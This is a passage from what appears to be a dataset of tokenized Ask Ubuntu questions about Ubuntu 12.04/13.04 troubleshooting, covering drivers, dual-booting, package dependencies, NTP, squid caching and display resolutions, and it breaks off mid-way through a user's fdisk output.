323233	ubuntu 13.04 issues with screen and suspend	i installed ubuntu 13.04 yesterday on my sony vaio vpceg18fg ( http : //www.sony-asia.com/product/vpceg18fg ) . there are two problems . 1 ) i can not increase/decrease screen brightness 2 ) after waking from suspend mode , the computer hangs . even the mouse pointer does n't move . i have not checked `` install third party software '' during installation please help .
323236	wacom tablet in 13.04	i 've been scanning the forums looking for a straight answer . i 'm planning on buying a wacom intuos5 large for graphic design and art work but would like to know if ubuntu has enough decent support for me to get full functionality out of my tablet . i would n't mind doing some heavy programming to get things working right , but as long as it is possible , and as long as there are enough resources for me to search through since i know 0 c ( programming ) or any other programming language for that matter , beyond php . so , will my tablet work perfectly in ubuntu ? or will i have to dual-boot ? ( really do n't want to dual boot )
323238	how to configure ntp with permanent slew adjustments ?	there are several questions that i hope the community can assist with : is the following approach correct and a recommended best practice ? would ntpd with the -x option be persistent even after a server crash/reboot ? are there be any potential points that might have been missed out ? thanks in advance and best regards ! background i am currently in the midst of deploying ubuntu server 12.04.1 lts to a client 's live environment , following the instructions found in the official installation guide . there are several business requirements from the client for ntpd as the system clock will be used for timestamping log files : the system clock must always be consistent ( stratum 3 ) should the clock be out of sync , it must be adjusted in small increments ( aka slew ) to avoid inconsistent timestamps that happens during large increments ( aka step ) based upon these , i think that it would be best to run ntpd using sudo /etc/init.d/ntp reload -x
323240	how do i create a pgp key revocation certificate in seahorse	i created a pgp key using seahorse in ubuntu 's passwords and keys ( 13.04 ) . to my understanding , creating a revocation certificate for the pgp key is important for a couple of reasons . i do n't see any way of creating the revocation certificate in ubuntu . i would appreciate some direction with this issue .
323241	how to know if squid proxy is doing the cache correctly	i wanted to test if the clients attached to a squid server are actually using the cache data instead of going directly to the internet and retrieving the data . i have configured all clients browsers to read the server : port from the squid server ( which is 10.42.0.1:3128 ) . so how do i know if they are retrieving the information from the cache or the internet . i asked since a quick `` test '' gave me the same speed when loading several pages that had many images on them . same images and not ads that change on every visit . what ways can i use to check if they are using the cache ? i ran the following : sudo tail -f /var/log/squid3/access.log and got several lines that kept on scrolling : 1374553166.136 929 185.168.101.131 tcp_miss/200 28198 get http : //www.amazon.de/gp/offer-listing/b000noiw62/ref=sr_1_1_olp ? - direct/178.236.7.219 text/html they had a tcp_miss/200 and at the end had a direct as the example above . this happened while i had all computers in the lan turned off . when i tried to used one i got the following doing a sudo tail -f /var/log/squid3/access.log | grep hit 1374553387.488 0 10.42.0.14 tcp_ims_hit/304 278 get http : //g-ecx.images-amazon.com/images/g/01/da/creatives/sn130.png - none/- image/png so it shows as tcp_ims_hit/304 and at the end it shows a none so what does the tcp_miss , direct , tcp_ims_hit and none mean ? is the cache working ?
323245	where does unity keep information on the launchers in dash ?	i know where the general launchers are , the ones in /usr/share/applications and the likes . what i 'm wondering is where unity stores the launchers that are actually pinned to the side bar . anyone know ?
323246	how can i reinstall packages accidentally removed when trying to remove another package ?	i accidently executed sudo apt-get remove -- purge gstreamer0.10 , and the packages such as gimp , gnome- , rhythmbox and etc are removed , so i forced to stop the processing , but i do n't remember what packages were deleted . how can i reinstall the packages ?
323247	bluetooth mouse not functioning	so i am using ubuntu 12.04 and i have a generic brand mouse and a generic brand usb bluetooth module . my issue is that i ca n't quite use the mouse . i can connect but nothing happens . the two devices are connected , but the mouse itself does nothing . any idea as to why it is doing that ? i am still relatively new to this .
323249	windows 8 os not detected , 12.04 install ( new computer build , uefi/secure boot enabled )	i recently built a new computer with the intent to dual boot windows 8 and ubuntu 12.04 . i first installed windows 8 , and elected to do so in uefi mode with secure boot enabled . my understanding is that i should be able to install ubuntu 12.04 lts alongside windows 8 . i burned the 12.04 image to dvd and was able to boot ( from the installation dvd ) in efi mode as expected . what was unexpected was the installer 's inability to recognize my existing windows 8 installation on the machine . based on my reading of previous threads , i went ahead and ran boot-repair from the ubuntu live dvd ( that is , `` try ubuntu without installing '' ) ; the output information is here : http : //paste.ubuntu.com/5902713/ the windows 8 installation is on drive sdb , and i noted in the output ( line 189 ) that os-prober does not detect windows on sdb4 where i believe it should be found . in original dump files i noticed lines which stated `` /dev/sdb1 ends after the last sector of /dev/sdb '' for sda/b/c , and ( following instructions from another thread ) used gdisk to generate fresh protective mbrs for each . the installer is still unable to detect my installation for windows 8 . instead , it presents me with only the following options : erase disk and install ubuntu something else what actions should i take ? any help would be very much appreciated . thanks ! update thanks again for the help so far everyone ! i went ahead and partitioned the drives manually for the install ; the brief summary is as follows : sda ( 1-3 ) : microsoft ( ms ) reserved ; ntfs data ; swap sdb ( 1-5 ) : ms ( efi install ) ; efi ; ms reserved ; windows 8 os ; ubuntu 12.04.2 os ( / ) sdc ( 1-3 ) : ms reserved ; ntfs data ; ext4 data ( /home ) i completed the install , and have no problems booting into windows 8 . however , i have not been able to boot into ubuntu . initially , prioritizing ubuntu in the bios boot order briefly showed an ubuntu splash screen before going black and hanging . since that first attempt , the bios skips ubuntu entirely and progresses straight to booting windows . i went back to the installation dvd and `` tried ubuntu '' to run boot-repair again . the updated output information is here : http : //paste.ubuntu.com/5909477/ my thought is to try and run boot-repair after backing up windows . is that the right course of action , or what would you all recommend ? thanks for your continued help ! brian
323253	compact disk software and playonlinux	i am trying to install a software that came with my usb interface on playonlinux . i am not getting very far . how do i install software thatâs on a compact disk on linux ? oh i am using ubuntu 13.4 by the way .
323254	how to use bibus to reference website ?	this might seem a very dumb question but i ca n't find a way to reference a website ; i 've tried to use the www type option but it 's not working for me . i have n't found a way to do this in the documentation . anyway , what i really want to create is this : ( preferably apa style ) satalkar , b . ( 2010 , july 15 ) . water aerobics . buzzle.com . retrieved july 16 , 2010 , from http : //www.buzzle.com . extra question : is is possible to do this using only libreoffice ? thanks in advance for your answers .
323259	installing ubuntu on nexus 7	i am trying to install ubuntu on my nexus 7 as mentioned in the official wiki . however , when i run the ubuntu nexus7 installer i get an error saying that it can not download the content ( my connection is working correctly ) . i tried to do it manually as mentioned the official wiki post as well , they said i should download the image from http : //cdimage.ubuntu.com/daily-preinstalled/current/ but it shows the 404 error ! help me please , i have already unlocked the bootloader and lost all my data .
323260	will i lose mysql installation and associated databases if i reinstall ubuntu ?	i just ran into an os issue , and i was thinking of simply doing a reinstall of ubuntu . i was looking at the ubuntu installation options , and i saw that i could `` reinstall ubuntu 13.04 '' . `` documents , music ... .. installed software will be kept where possible . system-wide settings will be cleared . '' originally , i was using this linuxbox for a wordpress installation , it had the lamp stack installed . will mysql and php be kept ? also , will i be able to reinstall without damaging/wiping out the database for wordpress ? those are the two biggest concerns on my mind right now , and as a linux noob , i 'm really hoping i do n't lose those two .
323266	darcula dark theme for eclipse	i wonder if there is a way to use android studio darcula theme in eclipse ? i am trying to make eclipse look a little bit like as . so far i have made changes to the editor window and i have no idea how to tackle the rest of window frames etc . any ideas ?
323274	how to dual boot windows 7 & ubuntu ?	i want to dual boot windows 7 and ubuntu on my pc , but i think i need a little help since this is the first time i do any dual booting . i 'm following the instructions from http : //lifehacker.com/5403100/dual+boot-windows-7-and-ubuntu-in-perfect-harmony my computer specs : windows 7 home premium 64-bit intel pentium dual core 2.00ghz 320gb hdd ( 200gb free ) 4gb ram which version of ubuntu should i download ? will it really work ? any other help will be appreciated . thanks !
323284	ftps client , preferably integrated in nautilus ?	i like nautilus for ftp/webdav , but how to use it with an ftps server ? when i enter ftps : // nautilus says do n't recognize this file server type . is there any plugin ? or something as quick and convenient as nautilus , with ftps support ? gftp from ubuntu 's repo says ftps support unavailable since ssl support was not compiled in . note from wikipedia : ftps should not be confused with the ssh file transfer protocol ( sftp ) , an incompatible secure file transfer subsystem for the secure shell ( ssh ) protocol . it is also different from secure ftp , the practice of tunneling ftp through an ssh connection .
323293	nvidia drivers do n't work with gtx 780	i was using gtx 560 with nvidia 's drivers in ubuntu without problem . then i have removed that video card and used intel hd4000 for a week . after that i installed gtx 780 , connected lcd with hdmi cable ( no dvi on it ) and it got weird . the only resolution i have is 1024*720 , systemsettings -- displays calls my lcd a 'laptop ' and offers no options for it . systemsettings -- software -- additional drivers is empty . i have tried installing nvidia driver packages from repositories with apt-get but it did no visible difference . x just does not pick them up . i just feel that writing xorg.conf in 2013 is not a right thing to do . am i wrong ? sure , i can just download nvidia drivers from their site , install drivers from binary , create xorg.conf file and be entitled to manual reinstallation of it with every kernel update . may be somebody can tell me a less awkward solution ?
323300	any way to make unity completely 2d or get unity 2d back in ubuntu 13.04	i 'm a big fan of the unity desktop and i 'd like to use it under ubuntu 13.04 . however my linux systems are low end and old so i ca n't run it . i know there may have been many forums and questions about it on here but i 've occasionally been checking the internet since unity 2d was dumped in ubuntu 13.04 and i want to get back to using unity .
323304	problem starting up	i am a beginner of ubuntu , so i do n't know that much about it . however , i am experiencing some problems concerning booting up . first of all , i just built a new pc , and i wanted to put ubuntu on it . my old computer was a mac , so some things might differ . however , to start with the problem : i have ubuntu on a usb , which i use to start it up . when turning my pc on , i get the gnu grub menu , where i can choose between 'try ubuntu without installing ' , 'install ubuntu ' and 'check disc for defects ' . if i choose install ubuntu , i get a black screen where i ca n't do anything . if i choose check disc for defects , i get the same message . the other option is try ubuntu without installing . first , i get an ubuntu loading screen , which is a good sign , however after that i am greeted with a busybox v1.18.5 screen , where everything , including my keyboard is unresponsive . i am using ubuntu 12.04
323305	creating custom installation disk	i 've two important question : 1- why ubuntu and also kubuntu are downloadable in their simple mood ? mean why they do n't have additional softwares such as java and wine and dictionary and etc . i know that we must download it from software center but it takes time and also cost . internet is n't free and also all people do n't have access to high speed internet . also so many times the software center 's server is busy and we can not download with high speed or even it gives error . 2- consider that i 've downloaded kubuntu and installed all of my necessary softwares on it . how can i create an installation dvd to use it in the future when i want to reinstall kubuntu ( i wan na save time and cost to avoid re-download sotwares from internet ) and give this installation disk to my friends ?
323306	network problem : can not connect to a ping-able website with firefox	for some reason i need to configure my computer using static ip settings to let other computers to find it . here 's my settings in /etc/network/interfaces : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto wan0 iface wan0 inet static address 192.168.2.100 netmask 255.255.255.0 gateway 192.168.2.1 nameserver 140.112.254.4 8.8.8.8 dns-domain ssg5-serial dns-search ssg5-serial and then i tried to connect to the internet using firefox but it can never connect to the web server correctly . so i tried to ping www.facebook.com and i get : ping : unknown host www.facebook.com this might be a problem with the dns server , so i used another computer to nslookup www.facebook.com and get the ip 31.13.68.8 . therefore i tried to ping 31.13.68.8 and it can ping this ip correctly . so i try to connect to facebook with firefox directly using the address 31.13.68.8 . strangely , it will automatically change the address to www.facebook.com but still ca n't show the page . does that mean the dns server works ? the last step i tried is to ssh 192.168.2.100 to this computer and it works . i can log in to the computer and control it . i guess that means the ip setting is correct ? i ca n't figure out what the problem is and how to solve it . thanks for any advice !
323307	how to add bbc podcasts to rhythmbox ?	i copied link address from rss feed here http : //www.bbc.co.uk/podcasts/series/comedy . then clicked add button in rhythmbox podcast and added http : //downloads.bbc.co.uk/podcasts/radio4/comedy/rss.xml it gave the error that `` the feed does not contain any downloadable items '' . how to fix this problem ? thanks .
323308	just installed ubuntu , but my wireless networks are n't showing up	as the title says , my wireless networks are n't showing up can someone help please ? i have 12.04 thanks .
323319	install wine1.6-amd64 from ubuntu-wine ppa asked for installing wine1.6-i386 as well	when installing wine1.6 and wine1.6-amd64 from ppa : ubuntu-wine on kubuntu 12.10 ( quantal ) , it always asked me for installing wine1.6-i386 root @ ezgo64 : /etc/apt/sources.list.d # lc_all=c apt-get install wine1.6 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.6 : depends : wine1.6-i386 ( = 1.6-0ubuntu1~ppa1 ) but it is not installable recommends : ttf-mscorefonts-installer but it is not installable recommends : fonts-horai-umefont but it is not going to be installed recommends : fonts-unfonts-core but it is not going to be installed recommends : winbind but it is not going to be installed e : unable to correct problems , you have held broken packages . root @ ezgo64 : /etc/apt/sources.list.d # lc_all=c apt-get install wine1.6 wine1.6-amd64 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.6 : depends : wine1.6-i386 ( = 1.6-0ubuntu1~ppa1 ) but it is not installable recommends : ttf-mscorefonts-installer but it is not installable recommends : fonts-horai-umefont but it is not going to be installed recommends : fonts-unfonts-core but it is not going to be installed recommends : winbind but it is not going to be installed e : unable to correct problems , you have held broken packages . however , how could i install wine1.6-i386 on a amd64 box ? therefore i need to download the package , extract it and change the dependency to remove wine1.6-i386 so that i can install this amd64 version of wine1.6 . wine1.5 has the same problem . any suggestions ? new information added : thanks for suggestions . however when i tried to install wine1.6-i386 , it asked for a lot of other i386 packages like libgstreamer0.10-0 : i386 . i was not able to install it and did n't know how to solve such dependencies . any help will be appreciated .
323322	why is my second monitor stuck on 4:3 at 1024x768	i have been using a second monitor for a while now , and until i connected it to our tv via the vga port everything went well . then , yesterday morning , after i unplugged the vga cable from the tv and hooked it back on to the second monitor , i was surprised to see that the resolution was set to just 1024x768 rather than the 1680x1050 it should be . following the instructions i found at screen resolution stuck at 1024x768 , i managed to add a new resolution of 1366x768 however , the top icons are half off the screen , and the other icons on the second monitor are still huge . another problem at that resolution is that there is about a quarter of the screen not visible between the two monitors . i tried adding 1680x1050 with xrandx but that told me xrandr : can not find mode `` 1680x1050 '' the second monitor is a viewsonic va2016w memory : 6 gib processor : intel® core™ i3-2350m cpu @ 2.30ghz × 4 graphics : intel® sandybridge mobile - 2 gib os : ubuntu 13.04 64-bit there are no proprietary drivers used , installed or offered . modes now offered : 1024x768 , 800x600 and 1366x768 the resolution was 1680x1050 as shown here and the full data sheet here . if anyone has any advicce or suggestions on how to sort this out , i 'd be most appreciative . thanks in advance . update after rebooting , the resolutions were reset to mirrored display with the viewsonic monitor set to 1024x768 ( 4:3 ) or 800x600 ( 4:3 ) could not assign crtcs to outputs : trying modes for crtc 63 crtc 63 : trying mode 1366x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) none of the selected modes were compatible with the possible modes : trying modes for crtc 63 crtc 63 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) trying modes for crtc 64 crtc 64 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 1360x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 1360x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 1366x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) none of the selected modes were compatible with the possible modes : trying modes for crtc 63 crtc 63 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) trying modes for crtc 64 crtc 64 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 1360x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 1360x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) trying modes for crtc 64 crtc 64 : trying mode 1366x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) none of the selected modes were compatible with the possible modes : trying modes for crtc 63 crtc 63 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) trying modes for crtc 64 crtc 64 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 1360x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 1360x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 1366x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) none of the selected modes were compatible with the possible modes : trying modes for crtc 63 crtc 63 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) trying modes for crtc 64 crtc 64 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 848x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 1360x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 1360x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 1024x768 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 800x600 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 800x600 @ 56hz with output at 1366x768 @ 60hz ( pass 1 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 )
323325	unmet dependencies after trying to install gcc-4.7 on ubuntu 12.04	i know there are already many questions about unmet dependencies but none of them helped me so far . even this really detailed answer ( how do i resolve unmet dependencies ? ) did n't solve my problem . this is what i did : sudo add-apt-repository ppa : ubuntu-toolchain-r/test sudo apt-get update sudo apt-get install gcc-4.7 the installation process was interrupted by the following error message : apt-get install 'gcc-4.7 ' failed : dpkg : error processing libquadmath0 : i386 ( -- configure ) : libquadmath0 : i386 4.6.3-1ubuntu5 can not be configured because libquadmath0 : amd64 is in a different version ( 4.8.1-2ubuntu1~12.04 ) dpkg : error processing libquadmath0 ( -- configure ) : libquadmath0 : amd64 4.8.1-2ubuntu1~12.04 can not be configured because libquadmath0 : i386 is in a different version ( 4.6.3-1ubuntu5 ) errors were encountered while processing : libquadmath0 : i386 libquadmath0 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) after that i 'm not able to install or remove any package . i always get the error message : the following packages have unmet dependencies : libquadmath0 : breaks : libquadmath0 : i386 ( ! = 4.8.1-2ubuntu1~12.04 ) but 4.6.3-1ubuntu5 is to be installed libquadmath0 : i386 : breaks : libquadmath0 ( ! = 4.6.3-1ubuntu5 ) but 4.8.1-2ubuntu1~12.04 is to be installed i already tried apt-get -f install which ends with : errors were encountered while processing : libquadmath0 : i386 libquadmath0 libgfortran3 libgfortran3 : i386 libhdf5-serial-1.8.4 : i386 liblapack3gf : i386 libnetcdf6 : i386 libnetcdf-dev : i386 ncview : i386 netcdf-bin : i386 i also tried apt-get clean , update , upgrade and dist-upgrade . but any upgrade wo n't work either for the same reason , a normal package installation wo n't work . how i understand the error messages that i get , is that the 386 version of the package libquadmath0 has a different version number then the amd64 version . ok , i see , that this can cause some troubles , but how can i solve this ?
323335	how to setup a wi-fi hotspot with an ubuntu laptop ( access point mode ) ?	i 've read this article before , and carefully followed the instruction that it porvided.and i am sure wireless card in my laptop support going into wireless access point mode . but unfortunately , when i use the following command to start hostapd service , i got sudo service hostapd stop starting advanced ieee 802.11 management hostapd [ fail ] since i am not familiar with ubuntu ( or linux ) , i ca n't figure out what happened and how to fix it . the instrution mentioned above said possibly because my wireless card does not support the g mode , and provided the wiki of hostapd . but what is g mode ? i tried to swtich to a , or b mode , but it just did n't work . can anyone help ? or provide a tool like connectify in windows ? thanks ! ps . i am using ubuntu 12.04 , 32 bit . i have an adsl wired network , and i want to share it by setting my laptop into a wifi hotspot with my windows phone .
323337	installing ogre3d in ubuntu 13.04 x64 ?	i 'm using code : :blocks . i 'm a c++ developer , and i need ogre3d for a project i 'm working on . i 've heard of ogre before , and the demo applications are impressive , so i have decided to use it . the problem is , i ca n't install it . the linux downloads page is a mix-mash of different tutorials that do n't work or return `` file not found '' errors . i 'm confused beyond belief as to how i actually set the thing up - the sdk is refusing to install despite installing libogre-dev with apt . please , please can someone make clear what i 'm actually meant to do ? i 've been searching the web and trying different things for 48 hours now , and have got nowhere . i ca n't even compile the example application , it says `` exampleapplication.h : file or directory not found '' when compiling with code : :blocks .
323338	how to install apps for windows phone in ubuntu ?	i have a nokia lumia with windows phone operating system . but software like zune ca n't run in ubuntu ( neither with wine ) , and i have no wifi network . i am trying to set my laptop into a wifi hotspot with a wired network , and put up this qurestion . so how can i install apps for my windows phone with an ubuntu laptop ? can anyone help ? thanks !
323339	how can i open .cpr ( cubase ) files ?	i have a bunch of old .cpr . those are project files created with cubase . in my case they do not contain audio , just midi . i would like to open them . how can i do that ? ps : the files were made with an le version of cubase which i fear i can not install with wine .
323342	will ubuntu edge be available to everyone after the indiegogo campaign ?	i noticed that ubuntu has n't mentioned this anywhere . will the phone be available after it 's backed by indiegogo and everyone who backed it gets theirs ? and will it be available through carriers if it will be available ?
323343	error in downloading	i want to create a dvd of my softwares installed on my kubuntu . i tried to download aptoncd but it ca n't be downloaded . i tried it from terminal and at 98 % it gave error that files can not get from server . is there any other software instead it ? or is there any .deb file ( aptoncd ) to download easily ?
323347	unable to dualboot win xp with ubuntu 13.04 on asus zenbook ux32a	i recently bought an asus zenbook ux32a . now i 'm trying to dualboot it with xp and ubuntu 13.04 . both os 's seem to have installed correctly but i just ca n't boot into grub to let me choose wich os i want to use . by default xp loads . i 've created separate partitions on my ssd and hdd . i would like to share the ssd for both os 's but keep all the documents and stuff on the hdd , so i mounted /var and /home to the hdd . / is on the ssd this is my fdisk output : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xc61722b1 device boot start end blocks id system /dev/sda2 2046 169228287 84613121 5 extended partition 2 does not start on physical sector boundary . /dev/sda4 * 169228288 322826239 76798976 7 hpfs/ntfs/exfat /dev/sda5 2048 7812594 3905273+ 83 linux /dev/sda6 7815168 15626239 3905536 82 linux swap / solaris /dev/sda7 15628288 169228287 76800000 83 linux warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 32.0 gb , 32017047552 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 